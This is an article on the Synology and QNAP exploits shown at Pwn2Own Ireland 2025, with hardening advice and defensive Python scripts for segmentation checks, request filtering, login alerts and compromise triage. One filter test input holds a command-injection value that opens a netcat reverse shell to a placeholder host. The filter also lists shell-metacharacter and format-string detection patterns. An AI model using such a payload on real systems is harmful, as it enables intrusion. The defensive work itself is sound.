Pwn2Own Ireland 2025: Synology and QNAP Devices Hacked for Over $335,000

The Pwn2Own Ireland 2025 competition has concluded, sending a clear message to the network-attached storage (NAS) market. Security researchers successfully exploited multiple Synology and QNAP devices, collectively earning more than $335,000 in prize money. The event underscores that even trusted storage platforms are not immune to sophisticated attacks, and it highlights the importance of keeping systems fully patched and of keeping their management interfaces off the public internet.

Pwn2Own is one of the world’s most recognized hacking contests, where top security researchers are invited to uncover and demonstrate previously unknown vulnerabilities (“zero-days”) in widely used hardware and software. Participating vendors, including Synology and QNAP, supply their products as live targets. Successful exploitation earns cash rewards and Master of Pwn points, while vulnerabilities are privately disclosed to vendors to allow coordinated patching. This process strengthens the cybersecurity ecosystem by closing dangerous gaps before criminals can exploit them.


QNAP Devices: The Most Targeted Hardware at Pwn2Own Ireland 2025

QNAP systems were the most frequently targeted throughout the three-day event, appearing in seven entries (six successful or collision entries plus one failed attempt) and earning researchers roughly $210,000 in total prizes by the per-entry tally at the end of this article.

$100,000 for a “SOHO Smashup”
Team DDOS achieved one of the contest’s largest payouts by chaining eight distinct vulnerabilities to compromise a QNAP Qhora-322 router and then the QNAP TS-453E NAS behind it. The “SOHO Smashup” category models exactly that real-world path: an attacker who breaks the edge router from the WAN side pivots into the internal network and reaches the NAS and other assets that were never exposed to the internet directly.

$40,000 for Multiple Injections
The DEVCORE Research Team and DEVCORE Intern Program exploited the QNAP TS-453E using multiple code injections and a format string flaw, successfully gaining full control of the device.

$20,000 for a Single Code Injection
On Day Two, Chumy Tsai of CyCraft Technology exploited the same TS-453E model using a single code injection vulnerability. The bug was distinct from those shown on Day One, so the entry earned the full unique-bug reward.

$20,000 for Hard-Coded Credentials and Injection
On Day Three, Sina Kheirkhah of the Summoning Team used hard-coded credentials combined with an injection flaw to seize control of the QNAP TS-453E. Hard-coded accounts remain one of the most dangerous weaknesses, allowing attackers to bypass authentication entirely.

$10,000 Collision Awards and Failures
Several teams, including PHP Hooligans, Evan Grant, and Team DDOS, received reduced “collision” prizes because their entries relied on a vulnerability that had already been demonstrated earlier in the contest or was already known to the vendor; only the first demonstration of a bug earns the full award. Another attempt, by Fuzzinglabs, did not produce a working exploit within the allotted time, which shows how competitive and technically demanding the environment has become. Note that a failed attempt says only that the exploit was not finished in time, not that the target is free of bugs.

Taken together, these results confirm that the QNAP TS-453E was one of the most analyzed and compromised devices of the entire event, with unique, collision, and failed attempts recorded across all three days.


Synology Devices: Multiple Product Lines Compromised

Synology hardware was also a central focus, yielding at least $165,000 in confirmed payouts and a diverse range of bug types spanning NAS units, a backup appliance, and an IP camera.

$50,000 for Dual Exploits on ActiveProtect DP320
The Summoning Team leveraged two unique vulnerabilities to achieve remote code execution on the Synology ActiveProtect Appliance DP320, the highest-value Synology exploit of the contest.

$40,000 for DiskStation DS925+ Remote Code Execution
Researcher Sina Kheirkhah (Summoning Team) used two bugs to gain full code execution on the Synology DS925+.
Separately, Verichains Cyber Force combined an authentication bypass with another unique flaw to obtain root access on the same model, earning $20,000.

$40,000 for Stack-Based Buffer Overflow in BeeStation Plus
The Synacktiv Team achieved root-level code execution on the Synology BeeStation Plus via a stack-based buffer overflow.

$15,000 for Known Bug in CC400W Camera
The Summoning Team also exploited the Synology CC400W camera, but since the vulnerability was already known to Synology, the entry was marked a collision with a reduced payout.

Across all attempts, Synology devices exhibited a mix of unique zero-days and one flaw already known to the vendor, covering multiple product categories from consumer NAS units and backup appliances to surveillance cameras.


How to secure against and prevent these attacks

Below are practical, targeted measures that reduce exposure to each successful or partial exploit from Pwn2Own Ireland 2025. The advice is kept specific to the reported bug type or attack chain so you can apply the right controls to the right failure mode. None of these measures replace the vendor patch: a network or configuration control limits who can reach a vulnerable service, it does not remove the vulnerability.

Treat any device that appears in the list as high priority to monitor, and patch it as soon as vendor updates are released.

1 Synology BeeStation Plus, stack based buffer overflow, root code execution
Immediate actions while patch is pending

  1. Isolate the device: place it on a dedicated storage or management VLAN with no route from your IoT or guest VLANs, and allow workstations to reach it only on the file-sharing ports you actually use.

  2. Remove any internet exposure: block inbound ports at your firewall, and restrict the device’s outbound connections to what it needs (for example vendor update servers).

  3. Disable remote management, cloud relay and remote-access features, and any unnecessary services (media streaming, unused file protocols) in the device settings. A memory-corruption bug in a network service is only reachable through that service, so every service you turn off removes an attack surface.

  4. Restrict accounts: change default passwords, create a unique admin account, and disable or remove default or unused accounts.

  5. Enable tight monitoring: forward logs to your SIEM or a log collector, and alert on unusual outbound traffic or unexpected process behavior.

  6. If the device is critical and cannot be isolated, consider a temporary replacement until a vendor fix arrives.

2 Synology DiskStation DS925+, two chained bugs causing code execution
Immediate actions while patch is pending

  1. Remove internet exposure for DSM: block the DSM ports (5000 for HTTP and 5001 for HTTPS by default) and any other management ports on your perimeter firewall, and remove any port forwards or relay-style remote access for the device until it is patched.

  2. Require VPN for any remote access to DSM; do not allow direct remote logins.

  3. Turn off unused packages and services, especially community or third-party packages that expose web APIs.

  4. Enable MFA on all admin and privileged accounts, and rotate admin passwords immediately.

  5. Snapshot configuration and important data, and preserve logs and evidence in case of suspicious activity.

  6. Increase logging and alert thresholds for privilege escalation or new admin account creation.

3 Synology ActiveProtect DP320, dual bugs leading to RCE
Immediate actions while patch is pending

  1. Move the appliance to a management VLAN that only a small set of admin machines can reach.

  2. Block its internet egress except to vendor update servers if needed; prevent arbitrary outbound connections.

  3. Disable remote web-based management; only allow admin access through an internal jump host or VPN.

  4. Enforce unique credentials and enable MFA for appliance admin accounts.

  5. Monitor for any unexpected scanning or outbound C2 indicators from the appliance. A backup appliance holds copies of everything else on the network, so a compromise of it should be treated as a compromise of all the data it protects.

4 QNAP Qhora-322 router and TS-453E SOHO Smashup, chain of eight bugs, multiple injections
Immediate actions while patch is pending

  1. Disable remote router administration and UPnP on the router now, and restrict router admin access to a management VLAN or VPN only.

  2. Create strict network segmentation: put router management, IoT, and NAS on separate VLANs and deny inter-VLAN traffic except where explicitly required.

  3. Block management ports between VLANs; in particular, nothing on the router or IoT segments should be able to reach the NAS admin interface.

  4. Apply the latest firmware to both router and NAS if available, even if the release notes look unrelated. Rebooting will evict a non-persistent, memory-only implant, but it also destroys volatile evidence; if you suspect a device is already compromised, collect its logs and a configuration export before you reboot.

  5. Monitor cross-VLAN traffic for lateral movement, and alert on any router-to-NAS connection: the router has no legitimate reason to open sessions to the NAS.
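The segmentation rules in steps 2, 3 and 5 are easiest to enforce if they are written down as an explicit allow-list and every cross-VLAN connection is checked against it. The script below is an added example written for this article, not QNAP or Synology software and not anything from the Pwn2Own entries. The VLAN layout, IP ranges, flow-record format and the flows themselves are constructed for illustration; the port list reflects DSM's default 5000/5001 and QTS's default 8080/443 plus SSH. Any cross-VLAN flow not on the allow-list is reported, and a flow that reaches an admin port from the wrong segment is the router-to-NAS pivot the SOHO Smashup category models.

```python
"""Check connection records against an explicit inter-VLAN allow-list.

Added example for this article, not code from QNAP, Synology or the
Pwn2Own entries. The VLAN layout, IP ranges, port numbers and flow
records are all constructed for illustration; replace them with your
own. Records are expected in the key=value form shown in SAMPLE_FLOWS.
"""
import ipaddress
from collections import namedtuple

# Assumed segment layout: segment name -> network.
SEGMENTS = {
    "mgmt": ipaddress.ip_network("10.0.10.0/24"),     # admin workstations, router admin
    "nas": ipaddress.ip_network("10.0.20.0/24"),
    "iot": ipaddress.ip_network("10.0.30.0/24"),      # cameras, TVs, anything untrusted
    "clients": ipaddress.ip_network("10.0.40.0/24"),
}

# Ports that reach NAS/router administration: DSM defaults 5000/5001,
# QTS defaults 8080/443, and SSH.
ADMIN_PORTS = {22, 443, 5000, 5001, 8080}

# Explicit allow-list of cross-VLAN flows: (src, dst, port); port None = any.
# Everything else is denied ("deny inter-VLAN traffic except where required").
ALLOWED = {
    ("mgmt", "nas", None),      # administrators manage the NAS
    ("clients", "nas", 445),    # workstations use SMB file shares only
}

Flow = namedtuple("Flow", "src dst dport")


def segment_of(ip):
    """Map an address to its segment name, or 'unknown' (e.g. internet)."""
    addr = ipaddress.ip_address(ip)
    for name, net in SEGMENTS.items():
        if addr in net:
            return name
    return "unknown"


def is_allowed(flow):
    src_seg, dst_seg = segment_of(flow.src), segment_of(flow.dst)
    if src_seg == dst_seg:
        return True  # intra-VLAN traffic is not governed by this policy
    return any(
        s == src_seg and d == dst_seg and (p is None or p == flow.dport)
        for s, d, p in ALLOWED
    )


def parse_flow(line):
    """Parse 'src=A dst=B dport=N ...' (constructed format)."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return Flow(fields["src"], fields["dst"], int(fields["dport"]))


def find_violations(lines):
    """Return (severity, src_segment, dst_segment, dport, line) for each
    cross-VLAN flow the allow-list does not permit. A denied flow that
    hits an admin port is 'high': that is the router/IoT-to-NAS pivot."""
    findings = []
    for line in lines:
        flow = parse_flow(line)
        if is_allowed(flow):
            continue
        severity = "high" if flow.dport in ADMIN_PORTS else "medium"
        findings.append((severity, segment_of(flow.src), segment_of(flow.dst),
                         flow.dport, line))
    return findings


# Constructed flow records (not real traffic).
SAMPLE_FLOWS = [
    "src=10.0.10.5 dst=10.0.20.10 dport=5001 proto=tcp",   # admin -> DSM: allowed
    "src=10.0.40.22 dst=10.0.20.10 dport=445 proto=tcp",   # client -> SMB: allowed
    "src=10.0.30.7 dst=10.0.30.9 dport=80 proto=tcp",      # intra-IoT: not policed
    "src=10.0.30.7 dst=10.0.20.10 dport=8080 proto=tcp",   # camera -> NAS admin: high
    "src=10.0.40.22 dst=10.0.20.10 dport=5000 proto=tcp",  # client -> DSM: high
    "src=10.0.20.10 dst=10.0.10.5 dport=22 proto=tcp",     # NAS -> admin host: high (lateral movement)
    "src=10.0.20.10 dst=10.0.40.22 dport=8443 proto=tcp",  # NAS -> client, odd port: medium
]

if __name__ == "__main__":
    for finding in find_violations(SAMPLE_FLOWS):
        print(*finding)
```

The check is deliberately direction-aware: the NAS initiating a connection to an admin workstation is reported even though the reverse direction is allowed, because a NAS that starts reaching out to other hosts is exactly what a post-exploitation pivot looks like.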

5 QNAP TS-453E, multiple injections plus format string bug
Immediate actions while patch is pending

  1. Disable or remove web-facing third-party apps, reducing the number of web interfaces exposed.

  2. Restrict management access to LAN or VPN only; block public access at the perimeter.

  3. Run QNAP’s Security Counselor app and fix high and critical findings immediately.

  4. Put the web interface behind a reverse proxy with basic filtering rules, or a network WAF appliance if available, to drop obvious injection payloads. Treat this as a stop-gap: signature filters can be bypassed with encoding tricks and do nothing about the underlying bug.

  5. Log web request payloads and watch for format-string sequences (%n, %x, %s, %p, especially repeated runs of them) and shell metacharacters (;, |, backticks, $( )) in parameters that should only ever contain file names or paths.

6 QNAP TS-453E, single code injection bug (Chumy Tsai)
Immediate actions while patch is pending

  1. Close exposure points: block external access to the NAS web interface and require VPN for remote admin.

  2. Audit installed applications and remove anything that accepts free-form input or runs user-supplied code.

  3. Apply least privilege to services and avoid running web-facing services as root. On a NAS this is largely in the vendor’s hands, so prefer vendor packages over third-party ones and uninstall what you do not use.

  4. Deploy simple WAF rules or reverse-proxy filters to drop common injection payload signatures.

  5. Monitor for unexpected new files, web shells, or processes spawned by web apps; a web server process that spawns a shell is the classic sign of a command injection being exploited.
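Steps 4 and 5 of this section and of the previous one (the format-string and injection entries against the TS-453E) both come down to a filter in front of the web interface that looks for the two payload shapes involved. The following Python script is an added example written for this article, not part of QNAP’s or Synology’s software and not the payloads the researchers used. The paths, parameter names and requests are constructed; the detection rules are generic. It shows the one thing such a filter most often gets wrong: decoding the request only once, so that a doubly percent-encoded $(id) sails through.

```python
"""Screen NAS web requests for command-injection and format-string payloads.

Added example for this article, not part of QNAP's or Synology's
software and not the exploits shown at Pwn2Own. It is the kind of
filter one would put on a reverse proxy in front of the NAS web UI
while waiting for a patch. Paths, parameter names and requests are
constructed; the detection rules are generic.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# printf-style conversion specifications, e.g. %x, %08x, %3$n, %lx.
FMT_SPEC = re.compile(r"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|l|ll|z)?[diouxXcspn]")
# Characters that terminate or chain a command when a value reaches a shell.
SHELL_META = re.compile(r"[;|`\n]|\$\(")

MAX_DECODE = 3  # bound on repeated percent-decoding


def fully_decode(value, passes=MAX_DECODE):
    """Percent-decode until the value stops changing (bounded).
    A filter that decodes once misses %2524%2528id%2529, which is
    $(id) wrapped in two layers of encoding."""
    for _ in range(passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def format_string_risk(value):
    """Return a reason string if the value looks like a format-string attack.
    A single %d or %s is common in legitimate text, so require either a
    %n (the write primitive) or a run of specifiers (stack reading)."""
    specs = FMT_SPEC.findall(value)
    if any(s.endswith("n") for s in specs):
        return "format-string %n write"
    if len(specs) >= 4:
        return "format-string stack read"
    return None


def screen_request(target, body="", decode_passes=MAX_DECODE):
    """Return [(param, reason, decoded_value), ...] for a request target
    (path + query) and an optional form-encoded body."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, raw in params:             # parse_qsl already decoded once
        value = fully_decode(raw, decode_passes)
        reason = format_string_risk(value)
        if reason:
            findings.append((name, reason, value))
        if SHELL_META.search(value):
            findings.append((name, "shell metacharacter", value))
    return findings


# Constructed requests (not captured traffic, not the Pwn2Own payloads).
CLEAN = "/cgi-bin/filemanager?path=%2Fshare%2Fdocs&name=report.txt"
FORMAT = "/cgi-bin/filemanager?name=%25x%25x%25x%25x%25n"
INJECT_BODY = "hostname=nas01%3Bnc%20-e%20%2Fbin%2Fsh%20198.51.100.7%204444"
DOUBLE_ENC = "/cgi-bin/sysinfo?name=%2524%2528id%2529"
PERCENT_TEXT = "/search?q=100%25%20off"   # a legitimate '%' in ordinary text

if __name__ == "__main__":
    cases = [("clean", CLEAN, ""), ("format", FORMAT, ""),
             ("inject", "/cgi-bin/network", INJECT_BODY),
             ("double", DOUBLE_ENC, ""), ("percent", PERCENT_TEXT, "")]
    for label, target, body in cases:
        print(label, screen_request(target, body))
```

Two caveats apply. The decode loop is what makes the double-encoded case visible; run with decode_passes=0 the same request is reported as clean. And a filter like this only catches payloads that need metacharacters or format specifiers: an injection into a parameter the application already passes to a program as an argument can succeed with none of them, which is why the filter buys time and the patch fixes the problem.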

7 Synology DS925+, auth bypass plus secondary bug producing root RCE (Verichains)
Immediate actions while patch is pending

  1. Enforce multi-factor authentication for all admin and privileged accounts immediately. Be clear about what it buys you: MFA on the login form does not stop an authentication bypass that never goes through the login form, but it does shut down the credential-based attacks that usually accompany one, so it is still worth enabling.

  2. Rotate admin passwords and disable unused admin accounts.

  3. Require management via VPN or an internal jump host only; block direct internet access to DSM.

  4. Harden session settings: reduce session lifetimes and increase session validation logging.

  5. Watch for unusual login sources, repeated token refreshes, and any elevation-of-privilege events.

8 Synology CC400W camera, known bug collision, partial success
Immediate actions while patch is pending

  1. Inventory every CC400W and log firmware versions. Treat those devices as high priority.

  2. If a patch is not available, isolate the camera on a VLAN with no access to NAS or management networks.

  3. Disable any remote streaming or cloud features, change default passwords, and set unique credentials.

  4. Consider temporary device replacement or removal from the network if isolation is not possible.

  5. Monitor camera outbound connections and block any unexpected external endpoints.

9 QNAP TS-453E, previously seen bug collision (PHP Hooligans and others)
Immediate actions while patch is pending

  1. Run vulnerability scanning against your fleet to identify affected versions and services.

  2. Block access to the vulnerable service at the network level until a vendor fix is installed.

  3. Apply mitigation workarounds provided in vendor or CERT notices, for example disabling a specific service or feature.

  4. Increase monitoring on the ports and services named in the vendor advisory, and alert on exploit-like behavior.

10 QNAP TS-453E, hard coded credentials plus injection (Sina Kheirkhah)
Immediate actions while patch is pending

  1. Inspect for default or shared credentials across all devices, and change any that are default immediately.

  2. On devices whose baked-in credentials cannot be changed, isolate them from all but the necessary management hosts.

  3. If the vendor confirms an embedded credential, treat the device as high risk and consider replacement or strict isolation until it is fixed.

  4. An account name cannot be blocked at the network layer, but you can restrict the protocols it could be used over (SSH, web admin) to the management VLAN, and log and alert on every authentication attempt for the affected account names, both on the device and on any VPN or proxy in front of it.
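The login monitoring asked for in step 4 here and in step 5 of section 7 (unusual login sources and privilege changes after an authentication bypass) can be done with a short log-processing rule set. The script below is an added example written for this article, not a Synology or QNAP feature. The log line format is constructed (DSM and QTS each have their own syslog formats, so parse_line() must be adapted), the account watch-list is a placeholder for the vendor-documented built-in or service accounts of your model, and the admin source list and sample lines are assumptions.

```python
"""Flag risky NAS logins in authentication logs.

Added example for this article, not a Synology or QNAP feature. The
log format is constructed (DSM and QTS each have their own); adapt
parse_line() to the lines your device actually ships to syslog. The
account watch-list is a placeholder: put the vendor-documented
built-in, service or support accounts for your model there.
"""
import re
from collections import defaultdict

AUTH_RE = re.compile(r"^(?P<ts>\S+) \S+ auth: result=(?P<result>ok|fail) "
                     r"user=(?P<user>\S+) src=(?P<src>\S+) method=(?P<method>\S+)$")
GROUP_RE = re.compile(r"^(?P<ts>\S+) \S+ group: user=(?P<user>\S+) "
                      r"added_to=(?P<group>\S+) by=(?P<by>\S+)$")

# Assumed: accounts that must never log in interactively. A hard-coded
# credential is, by definition, one of these accounts.
WATCHLIST = {"svc_backup", "guest", "support"}
# Assumed: the only sources that should ever reach the admin interface.
KNOWN_ADMIN_SOURCES = {"10.0.10.5"}
PRIVILEGED_GROUPS = {"administrators"}
FAILURE_THRESHOLD = 2   # failures from one source before a success is suspicious


def parse_line(line):
    m = AUTH_RE.match(line)
    if m:
        return {"kind": "auth", **m.groupdict()}
    m = GROUP_RE.match(line)
    if m:
        return {"kind": "group", **m.groupdict()}
    return None


def detect(lines, watchlist=WATCHLIST, known_sources=KNOWN_ADMIN_SOURCES):
    """Return [(rule, user, src_or_actor, line)] in log order. Rules:
    watchlist_login   - a service/built-in account logged in
    unknown_source    - success from an address not on the admin list
    failures_then_ok  - brute-force pattern: failures then success from one src
    privilege_change  - a user was added to a privileged group
    """
    alerts = []
    failures = defaultdict(int)   # src -> failures since last success
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["kind"] == "group":
            if ev["group"] in PRIVILEGED_GROUPS:
                alerts.append(("privilege_change", ev["user"], ev["by"], line))
            continue
        src, user = ev["src"], ev["user"]
        if ev["result"] == "fail":
            failures[src] += 1
            continue
        if user in watchlist:
            alerts.append(("watchlist_login", user, src, line))
        if src not in known_sources:
            alerts.append(("unknown_source", user, src, line))
        if failures[src] >= FAILURE_THRESHOLD:
            alerts.append(("failures_then_ok", user, src, line))
        failures[src] = 0
    return alerts


# Constructed log lines (not from a real device).
SAMPLE_LOG = [
    "2025-10-23T09:01:12Z nas01 auth: result=ok user=alice src=10.0.10.5 method=web",
    "2025-10-23T09:02:40Z nas01 auth: result=fail user=admin src=203.0.113.9 method=web",
    "2025-10-23T09:02:41Z nas01 auth: result=fail user=admin src=203.0.113.9 method=web",
    "2025-10-23T09:02:43Z nas01 auth: result=ok user=admin src=203.0.113.9 method=web",
    "2025-10-23T09:05:00Z nas01 auth: result=ok user=svc_backup src=10.0.20.77 method=ssh",
    "2025-10-23T09:05:30Z nas01 group: user=svc_backup added_to=administrators by=svc_backup",
    "2025-10-23T09:06:00Z nas01 kernel: unrelated line that the parser ignores",
]

if __name__ == "__main__":
    for rule, user, src, line in detect(SAMPLE_LOG):
        print(f"{rule:18} user={user} src={src}")
```

The sample run produces five alerts: the admin login from an internet address after two failures fires two rules at once, the service-account SSH login fires two more, and the self-granted administrators membership fires the last. A successful login that arrives with no preceding failure from an unknown source is the pattern to expect from a hard-coded credential, which is why the unknown_source rule does not depend on the failure counter.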

11 QNAP TS-453E, reused bug collision (Evan Grant)
Immediate actions while patch is pending

  1. Confirm the device is patched to the latest available QTS baseline; if vendor guidance recommends temporary mitigations, apply them.

  2. Block external access to the vulnerable endpoint until you can apply the vendor patch.

  3. Perform forensic checks for signs of prior exploitation, such as new admin users, modified binaries, or unexpected scheduled jobs. These checks are only meaningful against a known-good baseline captured before the device was exposed.
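The three indicators in step 3 can be checked mechanically against a baseline. The script below is an added example written for this article, not a vendor tool. The baseline and “current” account list, scheduled jobs and file contents are constructed inline so it runs stand-alone; in real use the baseline is captured (and stored off the device) right after a clean install or firmware update, and the current state is read from the NAS over SSH. File paths and account names are illustrative.

```python
"""Triage a NAS for signs of prior exploitation against a known-good baseline.

Added example for this article, not a vendor tool. It checks new or
privileged accounts, new scheduled jobs, and modified binaries. The
baseline and current data are constructed inline; file paths and
account names are illustrative.
"""
import hashlib


def parse_passwd(text):
    """Return {user: (uid, gid, home, shell)} from passwd-style text."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _, uid, gid, _, home, shell = line.split(":", 6)
        accounts[user] = (int(uid), int(gid), home, shell)
    return accounts


def sha256(blob):
    return hashlib.sha256(blob).hexdigest()


def triage(base_passwd, cur_passwd, base_cron, cur_cron, base_hashes, cur_files):
    """Return a list of (indicator, detail) findings."""
    findings = []
    before, after = parse_passwd(base_passwd), parse_passwd(cur_passwd)
    for user, (uid, gid, home, shell) in after.items():
        if user not in before:
            findings.append(("new_account", user))
        if uid == 0 and user != "root":
            findings.append(("uid0_account", user))   # a second root, whatever its name
        if user in before and before[user][3] != shell:
            findings.append(("shell_changed", user))  # e.g. nologin -> /bin/sh
    base_jobs = {l.strip() for l in base_cron.splitlines()
                 if l.strip() and not l.startswith("#")}
    for line in cur_cron.splitlines():
        job = line.strip()
        if job and not job.startswith("#") and job not in base_jobs:
            findings.append(("new_cron", job))
    for path, blob in cur_files.items():
        expected = base_hashes.get(path)
        if expected is None:
            findings.append(("unbaselined_file", path))
        elif sha256(blob) != expected:
            findings.append(("hash_mismatch", path))
    return findings


# ---- constructed data (illustrative paths and names) ----
BASELINE_PASSWD = """root:x:0:0::/root:/bin/sh
admin:x:1024:100::/volume1/homes/admin:/bin/sh
alice:x:1026:100::/volume1/homes/alice:/sbin/nologin
"""
CURRENT_PASSWD = """root:x:0:0::/root:/bin/sh
admin:x:1024:100::/volume1/homes/admin:/bin/sh
alice:x:1026:100::/volume1/homes/alice:/bin/sh
support:x:0:0::/tmp:/bin/sh
"""
BASELINE_CRON = "0 3 * * * root /usr/local/bin/nightly-backup\n"
CURRENT_CRON = BASELINE_CRON + "*/5 * * * * root /tmp/.cache/update.sh\n"
# Stand-in file contents; real use hashes the actual binaries on disk.
BASELINE_FILES = {"/bin/busybox": b"busybox-v1", "/usr/sbin/httpd": b"httpd-v1"}
BASELINE_HASHES = {p: sha256(b) for p, b in BASELINE_FILES.items()}
CURRENT_FILES = {"/bin/busybox": b"busybox-v1-patched-by-attacker",
                 "/usr/sbin/httpd": b"httpd-v1",
                 "/usr/sbin/sshd2": b"not-in-baseline"}


def run_sample():
    return triage(BASELINE_PASSWD, CURRENT_PASSWD, BASELINE_CRON, CURRENT_CRON,
                  BASELINE_HASHES, CURRENT_FILES)


if __name__ == "__main__":
    for indicator, detail in run_sample():
        print(f"{indicator:17} {detail}")
```

A clean device compared with its own baseline returns no findings; the constructed current state returns six, including the one that matters most on a NAS: a second UID-0 account that is not called root. Hashing the binaries only helps if the baseline hashes were taken from a trusted copy and kept off the device, otherwise an attacker with root can rewrite them along with the binaries.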

12 QNAP TS-453E, reused bug collision (Team DDOS later entry)
Immediate actions while patch is pending

  1. Implement a rapid patch-and-verification process so that when the vendor releases a fix you can apply and verify it immediately.

  2. Where possible, automate patch deployment for critical devices, or schedule emergency maintenance windows.

  3. Temporarily harden default configs: restrict services, enable firewall rules, and require stronger authentication.

13 QNAP TS-453E, failed attempt (Fuzzinglabs)
What to take from a failed attempt

  1. Keep exploit mitigations enabled on the NAS; do not disable protections for convenience. A failed attempt in the contest means the exploit was not finished in the allotted time, not that the target is free of the bug.

  2. Ensure alerting and logging are functioning, and review any failed attempts against your own devices to understand attack patterns.

  3. Continue routine hardening, such as removing unused apps and enforcing least privilege, so that future attempts are more likely to fail.


The Broader Lesson for NAS Users

For NAS owners, the key lesson from Pwn2Own 2025 is clear: no system is invulnerable, not even one from an established brand with a strong security reputation.
Every NAS administrator should take these findings as an urgent call to action.

Essential Practices for NAS Security

• Remove exposure: keep management interfaces off the internet and allow remote management only over VPN.
• Enforce strong, unique credentials and enable multi-factor authentication for admin users.
• Apply vendor updates and security patches promptly, and subscribe to vendor advisory feeds.
• Segment device types onto separate VLANs and use strict firewall rules between segments.
• Use least privilege and privilege separation for device processes and services; avoid running services as root.
• For vendors: adopt secure development practices, including static analysis, fuzzing, sanitizer usage, and code review focused on memory safety and injection resilience.
• For vendors: employ runtime exploit mitigations, for example ASLR, stack canaries, non-executable memory, and control-flow integrity where supported. As a buyer, favor products whose vendors document these.
• Monitor devices with logs and anomaly detection; alert on unusual login patterns, large data transfers, or unexpected outgoing connections.
• Remove or replace devices that ship with hard-coded secrets or that lack vendor patch support.


Final Thoughts

Pwn2Own Ireland 2025 showcased the critical role of ethical hackers in hardening modern NAS ecosystems. Synology and QNAP, both event co-sponsors, are expected to coordinate with Trend Micro’s Zero Day Initiative to release timely patches.
While the vulnerabilities revealed may sound alarming, the coordinated disclosure model gives the vendors a window to ship fixes before the technical details are published. That protection only reaches devices that actually receive the update, which is why the patching and exposure advice above matters.

For end users and IT administrators, vigilance, prompt patching, and careful configuration remain the strongest defense against evolving NAS security threats.


Complete List of Synology and QNAP Appearances at Pwn2Own Ireland 2025

 # | Vendor   | Model                     | Team / Researcher                   | Bug Type or Technique                                  | Outcome             | Prize    | Day
---+----------+---------------------------+-------------------------------------+--------------------------------------------------------+---------------------+----------+------
 1 | Synology | BeeStation Plus           | Synacktiv                           | Stack-based buffer overflow                            | Root code execution | $40,000  | Day 1
 2 | Synology | DiskStation DS925+        | Summoning Team (Sina Kheirkhah)     | Two chained bugs (code execution)                      | Success             | $40,000  | Day 1
 3 | Synology | ActiveProtect DP320       | Summoning Team                      | Dual bugs (RCE)                                        | Success             | $50,000  | Day 1
 4 | QNAP     | Qhora-322 + TS-453E       | Team DDOS                           | Chain of 8 bugs, multiple injections (“SOHO Smashup”)  | Success             | $100,000 | Day 1
 5 | QNAP     | TS-453E                   | DEVCORE Research + Intern Program   | Multiple injections + format string bug                | Success             | $40,000  | Day 1
 6 | QNAP     | TS-453E                   | Chumy Tsai (CyCraft)                | Single code injection bug                              | Success             | $20,000  | Day 2
 7 | Synology | DiskStation DS925+        | Verichains Cyber Force              | Auth bypass + secondary bug (RCE as root)              | Success             | $20,000  | Day 2
 8 | Synology | CC400W Camera             | Summoning Team                      | Known bug (collision)                                  | Partial success     | $15,000  | Day 2
 9 | QNAP     | TS-453E                   | PHP Hooligans / others              | Previously seen bug (collision)                        | Collision           | $10,000  | Day 2
10 | QNAP     | TS-453E                   | Sina Kheirkhah (Summoning Team)     | Hard-coded credentials + injection                     | Success             | $20,000  | Day 3
11 | QNAP     | TS-453E                   | Evan Grant                          | Reused bug (collision)                                 | Collision           | $10,000  | Day 3
12 | QNAP     | TS-453E                   | Team DDOS                           | Reused bug (collision)                                 | Collision           | $10,000  | Day 3
13 | QNAP     | TS-453E                   | Fuzzinglabs                         | Failed attempt (no RCE)                                | Failure             | $0       | Day 3

 
